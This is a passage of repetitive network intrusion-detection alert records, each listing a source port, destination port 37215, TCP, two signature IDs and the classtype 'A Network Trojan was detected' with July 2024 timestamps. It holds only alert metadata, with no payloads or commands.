                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.638729
                  SID:2835222
                  Source Port:44812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.767768
                  SID:2829579
                  Source Port:43644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.148665
                  SID:2829579
                  Source Port:54124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.898852
                  SID:2835222
                  Source Port:60494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.668696
                  SID:2829579
                  Source Port:37532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.909294
                  SID:2829579
                  Source Port:50882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.518988
                  SID:2835222
                  Source Port:57224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.871003
                  SID:2835222
                  Source Port:46776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.186613
                  SID:2829579
                  Source Port:56192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.970105
                  SID:2835222
                  Source Port:50786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.763825
                  SID:2829579
                  Source Port:58756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.002170
                  SID:2835222
                  Source Port:46200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.619051
                  SID:2835222
                  Source Port:40380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.533117
                  SID:2835222
                  Source Port:49782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.881781
                  SID:2835222
                  Source Port:36990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.213907
                  SID:2835222
                  Source Port:53438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.831960
                  SID:2835222
                  Source Port:33872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.039124
                  SID:2835222
                  Source Port:34498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.803775
                  SID:2835222
                  Source Port:47626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.431901
                  SID:2835222
                  Source Port:58206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.268554
                  SID:2835222
                  Source Port:35316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.356986
                  SID:2835222
                  Source Port:58520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.023576
                  SID:2835222
                  Source Port:39788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.027342
                  SID:2835222
                  Source Port:37538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.455545
                  SID:2829579
                  Source Port:57666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.006056
                  SID:2829579
                  Source Port:41972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.933163
                  SID:2835222
                  Source Port:43584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.632991
                  SID:2835222
                  Source Port:52606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.645558
                  SID:2835222
                  Source Port:44918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.529158
                  SID:2835222
                  Source Port:53518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.542796
                  SID:2829579
                  Source Port:52262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.933807
                  SID:2835222
                  Source Port:51710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.363938
                  SID:2829579
                  Source Port:35788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.652674
                  SID:2829579
                  Source Port:56998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.186613
                  SID:2835222
                  Source Port:47752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.139461
                  SID:2829579
                  Source Port:54996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.435452
                  SID:2829579
                  Source Port:50988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.397639
                  SID:2829579
                  Source Port:59634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.811589
                  SID:2829579
                  Source Port:34146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.353895
                  SID:2835222
                  Source Port:39886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.004303
                  SID:2829579
                  Source Port:57822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.787588
                  SID:2829579
                  Source Port:55472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.903866
                  SID:2829579
                  Source Port:49618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.931862
                  SID:2835222
                  Source Port:44164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.841938
                  SID:2829579
                  Source Port:34518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.996062
                  SID:2829579
                  Source Port:41304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.292595
                  SID:2829579
                  Source Port:34842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.795103
                  SID:2835222
                  Source Port:33908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.912593
                  SID:2829579
                  Source Port:39308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.596894
                  SID:2829579
                  Source Port:58772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.498164
                  SID:2829579
                  Source Port:49846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.822867
                  SID:2835222
                  Source Port:52874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.389134
                  SID:2835222
                  Source Port:35764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.163941
                  SID:2835222
                  Source Port:38754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.343986
                  SID:2835222
                  Source Port:41882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.401175
                  SID:2835222
                  Source Port:53666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.196889
                  SID:2829579
                  Source Port:33720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.541812
                  SID:2835222
                  Source Port:41560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.990906
                  SID:2829579
                  Source Port:60724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.053274
                  SID:2835222
                  Source Port:52314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.417902
                  SID:2835222
                  Source Port:38146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.745002
                  SID:2829579
                  Source Port:43180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.846857
                  SID:2829579
                  Source Port:54028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.479148
                  SID:2829579
                  Source Port:39476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.857526
                  SID:2835222
                  Source Port:60790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.603262
                  SID:2835222
                  Source Port:49170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.199825
                  SID:2835222
                  Source Port:45190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.453618
                  SID:2835222
                  Source Port:48622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.431557
                  SID:2829579
                  Source Port:35040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.649070
                  SID:2835222
                  Source Port:46120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.781564
                  SID:2829579
                  Source Port:49486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.343381
                  SID:2829579
                  Source Port:58280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.253799
                  SID:2829579
                  Source Port:56480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.259600
                  SID:2835222
                  Source Port:56586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.251231
                  SID:2829579
                  Source Port:44638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.127270
                  SID:2835222
                  Source Port:50148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.835000
                  SID:2835222
                  Source Port:45406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.972385
                  SID:2835222
                  Source Port:44606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.871657
                  SID:2835222
                  Source Port:52952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.576804
                  SID:2835222
                  Source Port:57000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.831803
                  SID:2829579
                  Source Port:52436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.832991
                  SID:2829579
                  Source Port:38994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.730213
                  SID:2829579
                  Source Port:56458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.222070
                  SID:2829579
                  Source Port:43496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.896576
                  SID:2829579
                  Source Port:60500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.081950
                  SID:2835222
                  Source Port:51888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.681754
                  SID:2829579
                  Source Port:58860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.927122
                  SID:2829579
                  Source Port:35862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.894598
                  SID:2835222
                  Source Port:37400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.753198
                  SID:2829579
                  Source Port:58858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.445959
                  SID:2835222
                  Source Port:45242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.070048
                  SID:2835222
                  Source Port:55128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.454249
                  SID:2829579
                  Source Port:39182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.494095
                  SID:2835222
                  Source Port:56838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.979192
                  SID:2829579
                  Source Port:48798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.878204
                  SID:2835222
                  Source Port:49794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.367702
                  SID:2835222
                  Source Port:53164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.636058
                  SID:2835222
                  Source Port:45622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.629706
                  SID:2835222
                  Source Port:60662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.559243
                  SID:2829579
                  Source Port:46058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.371486
                  SID:2835222
                  Source Port:42854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.848972
                  SID:2829579
                  Source Port:59608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.867801
                  SID:2829579
                  Source Port:54048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.809030
                  SID:2835222
                  Source Port:35486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.242541
                  SID:2835222
                  Source Port:51544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.243765
                  SID:2829579
                  Source Port:49714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.421240
                  SID:2835222
                  Source Port:34902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.616284
                  SID:2835222
                  Source Port:57438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.784403
                  SID:2835222
                  Source Port:45848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.636807
                  SID:2829579
                  Source Port:38664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.127756
                  SID:2835222
                  Source Port:37272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.830604
                  SID:2835222
                  Source Port:47754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.822212
                  SID:2829579
                  Source Port:36238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.523580
                  SID:2829579
                  Source Port:44636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.894673
                  SID:2835222
                  Source Port:35702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.837168
                  SID:2829579
                  Source Port:33318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.231574
                  SID:2835222
                  Source Port:44788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.513425
                  SID:2829579
                  Source Port:50380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.512534
                  SID:2835222
                  Source Port:37750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.030999
                  SID:2829579
                  Source Port:43662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.675558
                  SID:2829579
                  Source Port:43234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.537516
                  SID:2835222
                  Source Port:32850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.858032
                  SID:2835222
                  Source Port:34002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.188191
                  SID:2835222
                  Source Port:52066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.836881
                  SID:2829579
                  Source Port:36166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.131250
                  SID:2835222
                  Source Port:41922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.191289
                  SID:2835222
                  Source Port:39302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.327774
                  SID:2835222
                  Source Port:59168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.490164
                  SID:2829579
                  Source Port:60274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.106544
                  SID:2829579
                  Source Port:45748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.024550
                  SID:2835222
                  Source Port:47190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.185788
                  SID:2829579
                  Source Port:34598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.521213
                  SID:2835222
                  Source Port:56008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.046264
                  SID:2835222
                  Source Port:35748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.921893
                  SID:2835222
                  Source Port:46242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.448345
                  SID:2829579
                  Source Port:41418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.546125
                  SID:2829579
                  Source Port:36666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.919171
                  SID:2829579
                  Source Port:34990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.019292
                  SID:2835222
                  Source Port:46864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.401175
                  SID:2835222
                  Source Port:33042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.571103
                  SID:2829579
                  Source Port:41218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.648004
                  SID:2829579
                  Source Port:36030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.551601
                  SID:2835222
                  Source Port:36300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.834773
                  SID:2829579
                  Source Port:37980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.122406
                  SID:2835222
                  Source Port:45482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.778339
                  SID:2829579
                  Source Port:46794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.476399
                  SID:2835222
                  Source Port:35834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.623017
                  SID:2835222
                  Source Port:52968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.141072
                  SID:2829579
                  Source Port:46806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.084191
                  SID:2835222
                  Source Port:42588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.645798
                  SID:2829579
                  Source Port:54684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.993711
                  SID:2829579
                  Source Port:41330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.761557
                  SID:2829579
                  Source Port:43096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.085617
                  SID:2835222
                  Source Port:58488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.201787
                  SID:2835222
                  Source Port:52600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.591175
                  SID:2835222
                  Source Port:57656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.516790
                  SID:2829579
                  Source Port:45152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.817840
                  SID:2835222
                  Source Port:43740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.219162
                  SID:2835222
                  Source Port:38872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.632510
                  SID:2835222
                  Source Port:53204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.527286
                  SID:2835222
                  Source Port:52914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.917695
                  SID:2835222
                  Source Port:54246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.500020
                  SID:2829579
                  Source Port:35738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.202917
                  SID:2829579
                  Source Port:34788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.405672
                  SID:2835222
                  Source Port:46012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.282645
                  SID:2829579
                  Source Port:46212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.751683
                  SID:2829579
                  Source Port:41210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.971584
                  SID:2829579
                  Source Port:45606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.175813
                  SID:2829579
                  Source Port:35528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.766848
                  SID:2835222
                  Source Port:58966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.996521
                  SID:2835222
                  Source Port:58684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.240926
                  SID:2829579
                  Source Port:47378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.531009
                  SID:2835222
                  Source Port:46368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.044301
                  SID:2835222
                  Source Port:60274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.320405
                  SID:2829579
                  Source Port:54286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.784403
                  SID:2829579
                  Source Port:58630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.621060
                  SID:2829579
                  Source Port:40254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.093550
                  SID:2835222
                  Source Port:46080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.827119
                  SID:2835222
                  Source Port:59908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.014226
                  SID:2835222
                  Source Port:39776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.339944
                  SID:2835222
                  Source Port:43914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.880072
                  SID:2835222
                  Source Port:36450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.133115
                  SID:2835222
